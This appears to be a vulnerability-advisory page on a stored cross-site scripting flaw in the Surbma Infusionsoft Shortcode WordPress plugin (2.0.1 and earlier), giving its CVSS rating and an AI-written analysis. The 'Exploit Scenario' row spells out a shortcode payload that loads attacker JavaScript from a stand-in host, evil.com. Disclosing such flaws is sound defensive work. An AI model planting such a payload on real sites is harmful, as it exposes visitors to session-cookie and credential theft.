Severity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Stored XSS requires a victim to visit the injected page (UI:R); contributor authentication required (PR:L); scope changes to victim browser (S:C); no availability impact.
Primary rating from Vendor (Wordfence).
CVSS VectorVendor: Wordfence
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Lifecycle Timeline
2DescriptionCVE.org
The Surbma | Infusionsoft Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'infusionsoft-form' shortcode in versions up to, and including, 2.0.1. This is due to insufficient input sanitization and output escaping on user-supplied 'account' and 'id' shortcode attributes in the surbma_infusionsoft_shortcode_shortcode() function, which are concatenated directly into a <script> tag's src attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
AnalysisAI
Stored Cross-Site Scripting in the Surbma | Infusionsoft Shortcode WordPress plugin (versions ≤ 2.0.1) allows authenticated contributors to inject persistent malicious scripts that execute in any visitor's browser. The flaw originates in the surbma_infusionsoft_shortcode_shortcode() function, where the 'account' and 'id' shortcode attributes are concatenated without sanitization directly into a <script> tag's src attribute - a particularly dangerous injection point because it bypasses many output-escaping checks that target HTML attribute or element contexts. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires an authenticated WordPress account with contributor role or higher (Contributor, Author, Editor, or Administrator). … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 3.1 base score of 6.4 (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N) reflects network exploitability with low complexity and scope change. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker with contributor-level WordPress credentials creates or edits a post or page and inserts the [infusionsoft-form account='evil.com/payload.js?x=' id='1'] shortcode, causing the plugin to render a <script src='https://evil.com/payload.js?x=1'></script> tag in the page HTML. When any site visitor - including administrators - loads that page, their browser fetches and executes the attacker's JavaScript, enabling session cookie theft, credential harvesting via injected login forms, or further exploitation. … |
| Remediation | Upstream fix commits are documented in the WordPress plugin trac changesets referenced in the CVE record, indicating the vulnerability has been addressed in a post-2.0.1 release; however, an exact patched version number is not independently confirmed from the available data - check the WordPress.org plugin page for the latest release and apply it immediately. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-39956
GHSA-7wpj-grc3-jrwm